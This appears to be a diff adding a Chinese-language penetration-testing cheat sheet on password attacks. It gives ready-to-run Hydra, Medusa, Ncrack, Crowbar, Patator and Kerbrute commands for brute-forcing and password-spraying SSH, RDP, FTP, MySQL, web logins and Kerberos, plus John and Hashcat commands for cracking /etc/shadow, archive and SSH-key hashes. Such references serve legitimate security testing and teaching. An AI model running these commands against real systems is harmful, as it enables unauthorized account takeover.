43
|
+
**Step 0**
|
|
44
|
+
> 导出PFX证书
|
|
45
|
+
_platform: linux_
|
|
46
|
+
```
|
|
47
|
+
certipy req -u user@domain.com -p password -ca CA_NAME -template User -out user.pfx
|
|
48
|
+
```
|
|
49
|
+
|
|
50
|
+
---
|
|
@@ -0,0 +1,462 @@
|
|
|
1
|
+
# 密码攻击
|
|
2
|
+
|
|
3
|
+
_11 条工具命令_
|
|
4
|
+
|
|
5
|
+
### Hydra `hydra`
|
|
6
|
+
_网络登录破解工具_
|
|
7
|
+
|
|
8
|
+
**Step 0**
|
|
9
|
+
> 使用用户名和密码字典爆破SSH
|
|
10
|
+
_platform: linux_
|
|
11
|
+
```
|
|
12
|
+
hydra -l user -P wordlist.txt ssh://target_ip
|
|
13
|
+
```
|
|
14
|
+
**语法解析:**
|
|
15
|
+
- `hydra` — Hydra破解工具 _command_
|
|
16
|
+
- `-l` — 指定用户名 _parameter_
|
|
17
|
+
- `-L` — 指定用户名字典文件 _parameter_
|
|
18
|
+
- `-p` — 指定密码 _parameter_
|
|
19
|
+
- `-P` — 指定密码字典文件 _parameter_
|
|
20
|
+
- `ssh://` — 目标服务协议 _value_
|
|
21
|
+
|
|
22
|
+
**Step 0**
|
|
23
|
+
> 爆破FTP服务
|
|
24
|
+
_platform: linux_
|
|
25
|
+
```
|
|
26
|
+
hydra -L users.txt -P passwords.txt ftp://target_ip
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
**Step 0**
|
|
30
|
+
> 爆破HTTP表单登录
|
|
31
|
+
_platform: linux_
|
|
32
|
+
```
|
|
33
|
+
hydra -l admin -P wordlist.txt target_ip http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
|
|
34
|
+
```
|
|
35
|
+
**语法解析:**
|
|
36
|
+
- `http-post-form` — HTTP POST表单模块 _value_
|
|
37
|
+
- `^USER^` — 用户名占位符 _value_
|
|
38
|
+
- `^PASS^` — 密码占位符 _value_
|
|
39
|
+
- `Invalid` — 失败响应标识 _value_
|
|
40
|
+
|
|
41
|
+
**Step 0**
|
|
42
|
+
> 爆破RDP服务
|
|
43
|
+
_platform: linux_
|
|
44
|
+
```
|
|
45
|
+
hydra -l administrator -P wordlist.txt rdp://target_ip
|
|
46
|
+
```
|
|
47
|
+
|
|
48
|
+
**Step 0**
|
|
49
|
+
> 爆破MySQL数据库
|
|
50
|
+
_platform: linux_
|
|
51
|
+
```
|
|
52
|
+
hydra -l root -P wordlist.txt mysql://target_ip
|
|
53
|
+
```
|
|
54
|
+
|
|
55
|
+
**Step 0**
|
|
56
|
+
> 指定线程数
|
|
57
|
+
_platform: linux_
|
|
58
|
+
```
|
|
59
|
+
hydra -t 4 -l user -P wordlist.txt ssh://target_ip
|
|
60
|
+
```
|
|
61
|
+
**语法解析:**
|
|
62
|
+
- `-t` — 并发线程数 _parameter_
|
|
63
|
+
|
|
64
|
+
**Step 0**
|
|
65
|
+
> 恢复之前中断的任务
|
|
66
|
+
_platform: linux_
|
|
67
|
+
```
|
|
68
|
+
hydra -R
|
|
69
|
+
```
|
|
70
|
+
**语法解析:**
|
|
71
|
+
- `-R` — 恢复任务 _parameter_
|
|
72
|
+
|
|
73
|
+
---
|
|
74
|
+
|
|
75
|
+
### John the Ripper `john`
|
|
76
|
+
_密码破解工具_
|
|
77
|
+
|
|
78
|
+
**Step 0**
|
|
79
|
+
> 使用字典破解哈希
|
|
80
|
+
_platform: linux_
|
|
81
|
+
```
|
|
82
|
+
john --wordlist=wordlist.txt hash.txt
|
|
83
|
+
```
|
|
84
|
+
**语法解析:**
|
|
85
|
+
- `john` — John破解工具 _command_
|
|
86
|
+
- `--wordlist=` — 指定字典文件 _parameter_
|
|
87
|
+
|
|
88
|
+
**Step 0**
|
|
89
|
+
> 指定哈希格式
|
|
90
|
+
_platform: linux_
|
|
91
|
+
```
|
|
92
|
+
john --wordlist=wordlist.txt --format=raw-md5 hash.txt
|
|
93
|
+
```
|
|
94
|
+
**语法解析:**
|
|
95
|
+
- `--format=` — 指定哈希格式 _parameter_
|
|
96
|
+
|
|
97
|
+
**Step 0**
|
|
98
|
+
> 显示已破解的密码
|
|
99
|
+
_platform: linux_
|
|
100
|
+
```
|
|
101
|
+
john --show hash.txt
|
|
102
|
+
```
|
|
103
|
+
**语法解析:**
|
|
104
|
+
- `--show` — 显示结果 _parameter_
|
|
105
|
+
|
|
106
|
+
**Step 0**
|
|
107
|
+
> 破解Linux密码文件
|
|
108
|
+
_platform: linux_
|
|
109
|
+
```
|
|
110
|
+
unshadow /etc/passwd /etc/shadow > mypasswd
|
|
111
|
+
john --wordlist=wordlist.txt mypasswd
|
|
112
|
+
```
|
|
113
|
+
**语法解析:**
|
|
114
|
+
- `unshadow` — 合并passwd和shadow文件 _command_
|
|
115
|
+
|
|
116
|
+
**Step 0**
|
|
117
|
+
> 破解ZIP文件密码
|
|
118
|
+
_platform: linux_
|
|
119
|
+
```
|
|
120
|
+
zip2john protected.zip > zip.hash
|
|
121
|
+
john --wordlist=wordlist.txt zip.hash
|
|
122
|
+
```
|
|
123
|
+
**语法解析:**
|
|
124
|
+
- `zip2john` — 提取ZIP密码哈希 _command_
|
|
125
|
+
|
|
126
|
+
**Step 0**
|
|
127
|
+
> 破解RAR文件密码
|
|
128
|
+
_platform: linux_
|
|
129
|
+
```
|
|
130
|
+
rar2john protected.rar > rar.hash
|
|
131
|
+
john --wordlist=wordlist.txt rar.hash
|
|
132
|
+
```
|
|
133
|
+
|
|
134
|
+
**Step 0**
|
|
135
|
+
> 破解SSH私钥密码
|
|
136
|
+
_platform: linux_
|
|
137
|
+
```
|
|
138
|
+
ssh2john id_rsa > ssh.hash
|
|
139
|
+
john --wordlist=wordlist.txt ssh.hash
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**Step 0**
|
|
143
|
+
> 使用暴力破解模式
|
|
144
|
+
_platform: linux_
|
|
145
|
+
```
|
|
146
|
+
john --incremental hash.txt
|
|
147
|
+
```
|
|
148
|
+
**语法解析:**
|
|
149
|
+
- `--incremental` — 暴力破解模式 _parameter_
|
|
150
|
+
|
|
151
|
+
---
|
|
152
|
+
|
|
153
|
+
### Hashcat `hashcat`
|
|
154
|
+
_GPU加速密码破解工具_
|
|
155
|
+
|
|
156
|
+
**Step 0**
|
|
157
|
+
> 使用字典破解MD5哈希
|
|
158
|
+
_platform: linux_
|
|
159
|
+
```
|
|
160
|
+
hashcat -m 0 -a 0 hash.txt wordlist.txt
|
|
161
|
+
```
|
|
162
|
+
**语法解析:**
|
|
163
|
+
- `hashcat` — Hashcat破解工具 _command_
|
|
164
|
+
- `-m 0` — 哈希类型(MD5) _parameter_
|
|
165
|
+
- `-a 0` — 攻击模式(字典攻击) _parameter_
|
|
166
|
+
|
|
167
|
+
**Step 0**
|
|
168
|
+
> 暴力破解模式
|
|
169
|
+
_platform: linux_
|
|
170
|
+
```
|
|
171
|
+
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
|
|
172
|
+
```
|
|
173
|
+
**语法解析:**
|
|
174
|
+
- `-a 3` — 暴力破解模式 _parameter_
|
|
175
|
+
- `?a` — 所有字符掩码 _value_
|
|
176
|
+
|
|
177
|
+
**Step 0**
|
|
178
|
+
> 掩码字符集说明
|
|
179
|
+
```
|
|
180
|
+
?l = abcdefghijklmnopqrstuvwxyz
|
|
181
|
+
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
|
182
|
+
?d = 0123456789
|
|
183
|
+
?s = 特殊字符
|
|
184
|
+
?a = 所有字符
|
|
185
|
+
?b = 0x00-0xff
|
|
186
|
+
```
|
|
187
|
+
|
|
188
|
+
**Step 0**
|
|
189
|
+
> 使用规则文件进行破解
|
|
190
|
+
_platform: linux_
|
|
191
|
+
```
|
|
192
|
+
hashcat -m 0 -a 0 hash.txt wordlist.txt -r rules/best64.rule
|
|
193
|
+
```
|
|
194
|
+
**语法解析:**
|
|
195
|
+
- `-r` — 指定规则文件 _parameter_
|
|
196
|
+
|
|
197
|
+
**Step 0**
|
|
198
|
+
> 组合两个字典
|
|
199
|
+
_platform: linux_
|
|
200
|
+
```
|
|
201
|
+
hashcat -m 0 -a 1 hash.txt wordlist1.txt wordlist2.txt
|
|
202
|
+
```
|
|
203
|
+
**语法解析:**
|
|
204
|
+
- `-a 1` — 组合攻击模式 _parameter_
|
|
205
|
+
|
|
206
|
+
**Step 0**
|
|
207
|
+
> 常用哈希类型编号
|
|
208
|
+
```
|
|
209
|
+
-m 0 = MD5
|
|
210
|
+
-m 100 = SHA1
|
|
211
|
+
-m 1400 = SHA256
|
|
212
|
+
-m 1700 = SHA512
|
|
213
|
+
-m 1000 = NTLM
|
|
214
|
+
-m 1800 = SHA512crypt
|
|
215
|
+
-m 3200 = bcrypt
|
|
216
|
+
-m 5600 = NetNTLMv2
|
|
217
|
+
-m 13100 = Kerberos TGS
|
|
218
|
+
```
|
|
219
|
+
|
|
220
|
+
**Step 0**
|
|
221
|
+
> 显示已破解的结果
|
|
222
|
+
_platform: linux_
|
|
223
|
+
```
|
|
224
|
+
hashcat -m 0 hash.txt --show
|
|
225
|
+
```
|
|
226
|
+
|
|
227
|
+
**Step 0**
|
|
228
|
+
> 测试GPU性能
|
|
229
|
+
_platform: linux_
|
|
230
|
+
```
|
|
231
|
+
hashcat -b
|
|
232
|
+
```
|
|
233
|
+
|
|
234
|
+
---
|
|
235
|
+
|
|
236
|
+
### Kerbrute `kerbrute-tool`
|
|
237
|
+
_Kerberos暴力破解工具_
|
|
238
|
+
|
|
239
|
+
**Step 0**
|
|
240
|
+
> 枚举域用户
|
|
241
|
+
```
|
|
242
|
+
kerbrute userenum -d domain.com --dc dc_ip users.txt
|
|
243
|
+
```
|
|
244
|
+
|
|
245
|
+
**Step 0**
|
|
246
|
+
> 密码喷洒攻击
|
|
247
|
+
```
|
|
248
|
+
kerbrute passwordspray -d domain.com --dc dc_ip users.txt Password123
|
|
249
|
+
```
|
|
250
|
+
|
|
251
|
+
**Step 0**
|
|
252
|
+
> 暴力破解用户
|
|
253
|
+
```
|
|
254
|
+
kerbrute bruteuser -d domain.com --dc dc_ip wordlist.txt username
|
|
255
|
+
```
|
|
256
|
+
|
|
257
|
+
**Step 0**
|
|
258
|
+
> 验证凭证
|
|
259
|
+
```
|
|
260
|
+
kerbrute -d domain.com --dc dc_ip user:password
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
---
|
|
264
|
+
|
|
265
|
+
### Medusa `medusa`
|
|
266
|
+
_快速并行网络登录暴力破解工具_
|
|
267
|
+
|
|
268
|
+
**Step 0**
|
|
269
|
+
> 4线程SSH密码暴力破解
|
|
270
|
+
```
|
|
271
|
+
medusa -h target_ip -u admin -P passwords.txt -M ssh -t 4
|
|
272
|
+
```
|
|
273
|
+
**语法解析:**
|
|
274
|
+
- `medusa` — 并行网络登录破解工具 _command_
|
|
275
|
+
- `-h` — 目标主机 _parameter_
|
|
276
|
+
- `-u` — 用户名 _parameter_
|
|
277
|
+
- `-P` — 密码字典文件 _parameter_
|
|
278
|
+
- `-M ssh` — 指定协议模块 _parameter_
|
|
279
|
+
- `-t 4` — 并发线程数 _parameter_
|
|
280
|
+
|
|
281
|
+
**Step 0**
|
|
282
|
+
> RDP远程桌面密码破解
|
|
283
|
+
```
|
|
284
|
+
medusa -h target_ip -U users.txt -P passwords.txt -M rdp -t 2
|
|
285
|
+
```
|
|
286
|
+
|
|
287
|
+
**Step 0**
|
|
288
|
+
> FTP破解(找到密码后停止)
|
|
289
|
+
```
|
|
290
|
+
medusa -h target_ip -U users.txt -P passwords.txt -M ftp -f
|
|
291
|
+
```
|
|
292
|
+
|
|
293
|
+
**Step 0**
|
|
294
|
+
> 批量主机爆破(5台并行)
|
|
295
|
+
```
|
|
296
|
+
medusa -H hosts.txt -U users.txt -P pass.txt -M ssh -t 3 -T 5
|
|
297
|
+
```
|
|
298
|
+
|
|
299
|
+
---
|
|
300
|
+
|
|
301
|
+
### Ncrack `ncrack`
|
|
302
|
+
_Nmap项目出品的高速网络认证破解工具_
|
|
303
|
+
|
|
304
|
+
**Step 0**
|
|
305
|
+
> SSH认证暴力破解
|
|
306
|
+
```
|
|
307
|
+
ncrack -vv -U users.txt -P passwords.txt ssh://target_ip
|
|
308
|
+
```
|
|
309
|
+
**语法解析:**
|
|
310
|
+
- `ncrack` — 高速网络认证破解工具 _command_
|
|
311
|
+
- `-vv` — 详细输出 _parameter_
|
|
312
|
+
- `ssh://target_ip` — 协议://目标格式 _value_
|
|
313
|
+
|
|
314
|
+
**Step 0**
|
|
315
|
+
> 同时破解多个目标的不同服务
|
|
316
|
+
```
|
|
317
|
+
ncrack -U users.txt -P pass.txt ssh://10.0.0.1 rdp://10.0.0.2 ftp://10.0.0.3
|
|
318
|
+
```
|
|
319
|
+
|
|
320
|
+
**Step 0**
|
|
321
|
+
> 直接导入Nmap扫描结果进行破解
|
|
322
|
+
```
|
|
323
|
+
ncrack -iX nmap_scan.xml -U users.txt -P pass.txt
|
|
324
|
+
```
|
|
325
|
+
|
|
326
|
+
---
|
|
327
|
+
|
|
328
|
+
### Crowbar `crowbar`
|
|
329
|
+
_专注RDP/VNC/SSH密钥/OpenVPN的暴力破解工具_
|
|
330
|
+
|
|
331
|
+
**Step 0**
|
|
332
|
+
> RDP密码暴力破解(2线程)
|
|
333
|
+
```
|
|
334
|
+
crowbar -b rdp -s target_ip/32 -u admin -C passwords.txt -n 2
|
|
335
|
+
```
|
|
336
|
+
**语法解析:**
|
|
337
|
+
- `-b rdp` — 指定协议类型 _parameter_
|
|
338
|
+
- `-s` — 目标IP/CIDR _parameter_
|
|
339
|
+
- `-n 2` — 并发连接数 _parameter_
|
|
340
|
+
|
|
341
|
+
**Step 0**
|
|
342
|
+
> 尝试多个SSH私钥登录
|
|
343
|
+
```
|
|
344
|
+
crowbar -b sshkey -s target_ip/32 -u root -k /path/to/keys/
|
|
345
|
+
```
|
|
346
|
+
|
|
347
|
+
**Step 0**
|
|
348
|
+
> VNC认证暴力破解
|
|
349
|
+
```
|
|
350
|
+
crowbar -b vnckey -s target_ip/32 -p password -k /path/to/keys/
|
|
351
|
+
```
|
|
352
|
+
|
|
353
|
+
---
|
|
354
|
+
|
|
355
|
+
### Patator `patator`
|
|
356
|
+
_多用途模块化暴力破解工具,支持数十种协议_
|
|
357
|
+
|
|
358
|
+
**Step 0**
|
|
359
|
+
> SSH登录暴力破解
|
|
360
|
+
```
|
|
361
|
+
patator ssh_login host=target_ip user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
|
|
362
|
+
```
|
|
363
|
+
**语法解析:**
|
|
364
|
+
- `ssh_login` — 使用SSH登录模块 _command_
|
|
365
|
+
- `FILE0/FILE1` — 引用字典文件(0和1编号) _variable_
|
|
366
|
+
|
|
367
|
+
**Step 0**
|
|
368
|
+
> HTTP登录表单暴力破解
|
|
369
|
+
```
|
|
370
|
+
patator http_fuzz url="https://target.com/login" method=POST body="user=FILE0&pass=FILE1" 0=users.txt 1=pass.txt -x ignore:fgrep="Login failed"
|
|
371
|
+
```
|
|
372
|
+
|
|
373
|
+
**Step 0**
|
|
374
|
+
> FTP密码暴力破解
|
|
375
|
+
```
|
|
376
|
+
patator ftp_login host=target_ip user=admin password=FILE0 0=passwords.txt
|
|
377
|
+
```
|
|
378
|
+
|
|
379
|
+
---
|
|
380
|
+
|
|
381
|
+
### CrackStation `crackstation`
|
|
382
|
+
_在线哈希查询和离线超大字典_
|
|
383
|
+
|
|
384
|
+
**Step 0**
|
|
385
|
+
> 在线哈希值反查明文密码
|
|
386
|
+
```
|
|
387
|
+
# 访问 https://crackstation.net
|
|
388
|
+
# 输入哈希值(支持MD5/SHA1/SHA256等)
|
|
389
|
+
# 支持批量查询(每行一个哈希)
|
|
390
|
+
```
|
|
391
|
+
|
|
392
|
+
**Step 0**
|
|
393
|
+
> 使用CrackStation超大字典离线破解
|
|
394
|
+
```
|
|
395
|
+
# CrackStation字典(15GB+):
|
|
396
|
+
# https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
|
|
397
|
+
# 配合hashcat使用:
|
|
398
|
+
hashcat -m 0 hashes.txt crackstation.txt
|
|
399
|
+
```
|
|
400
|
+
|
|
401
|
+
---
|
|
402
|
+
|
|
403
|
+
### SecLists字典 `seclists`
|
|
404
|
+
_安全测试人员必备的字典集合(目录、密码、用户名、Payload等)_
|
|
405
|
+
|
|
406
|
+
**Step 0**
|
|
407
|
+
> SecLists常用字典路径
|
|
408
|
+
_platform: linux_
|
|
409
|
+
```
|
|
410
|
+
# 目录字典:
|
|
411
|
+
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
|
|
412
|
+
/usr/share/seclists/Discovery/Web-Content/common.txt
|
|
413
|
+
|
|
414
|
+
# 密码字典:
|
|
415
|
+
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
|
|
416
|
+
|
|
417
|
+
# 用户名:
|
|
418
|
+
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
|
|
419
|
+
```
|
|
420
|
+
|
|
421
|
+
**Step 0**
|
|
422
|
+
> 特殊用途字典(LFI/SQLi/子域名/参数)
|
|
423
|
+
_platform: linux_
|
|
424
|
+
```
|
|
425
|
+
# Fuzzing Payload:
|
|
426
|
+
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
|
|
427
|
+
/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt
|
|
428
|
+
|
|
429
|
+
# 子域名:
|
|
430
|
+
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
|
|
431
|
+
|
|
432
|
+
# 参数名:
|
|
433
|
+
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
|
|
434
|
+
```
|
|
435
|
+
|
|
436
|
+
---
|
|
437
|
+
|
|
438
|
+
### RockYou字典 `rockyou`
|
|
439
|
+
_来自2009年RockYou数据泄露的经典密码字典(1400万+)_
|
|
440
|
+
|
|
441
|
+
**Step 0**
|
|
442
|
+
> 解压Kali自带的rockyou字典
|
|
443
|
+
_platform: linux_
|
|
444
|
+
```
|
|
445
|
+
gzip -d /usr/share/wordlists/rockyou.txt.gz
|
|
446
|
+
wc -l /usr/share/wordlists/rockyou.txt # 约14344392行
|
|
447
|
+
```
|
|
448
|
+
|
|
449
|
+
**Step 0**
|
|
450
|
+
> 配合各种密码破解工具使用
|
|
451
|
+
```
|
|
452
|
+
# Hashcat:
|
|
453
|
+
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
|
|
454
|
+
|
|
455
|
+
# John:
|
|
456
|
+
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
|
|
457
|
+
|
|
458
|
+
# Hydra:
|
|
459
|
+
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target
|
|
460
|
+
```
|
|
461
|
+
|
|
462
|
+
---
|